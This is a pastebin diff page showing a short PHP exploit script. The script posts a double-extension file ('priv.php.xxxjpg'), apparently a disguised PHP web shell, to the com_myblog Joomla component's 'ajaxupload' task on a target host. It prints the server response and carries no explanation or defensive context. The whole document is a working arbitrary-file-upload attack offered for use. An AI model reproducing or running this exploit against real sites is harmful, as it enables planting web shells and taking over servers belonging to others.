View difference between Paste ID: bEQjRnh0 and 2Ay4s8v6
SHOW: | | - or go back to the newest paste.
1
<?php
2
$uploadfile="priv.php.xxxjpg";
3
$ch = curl_init("http://jembut/index.php?option=com_myblog&task=ajaxupload");
4
curl_setopt($ch, CURLOPT_POST, true); 
5
curl_setopt($ch, CURLOPT_POSTFIELDS,
6
array('fileToUpload'=>"@$uploadfile"));
7
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
8
$postResult = curl_exec($ch);
9
curl_close($ch);
10
print "$postResult";
11
?>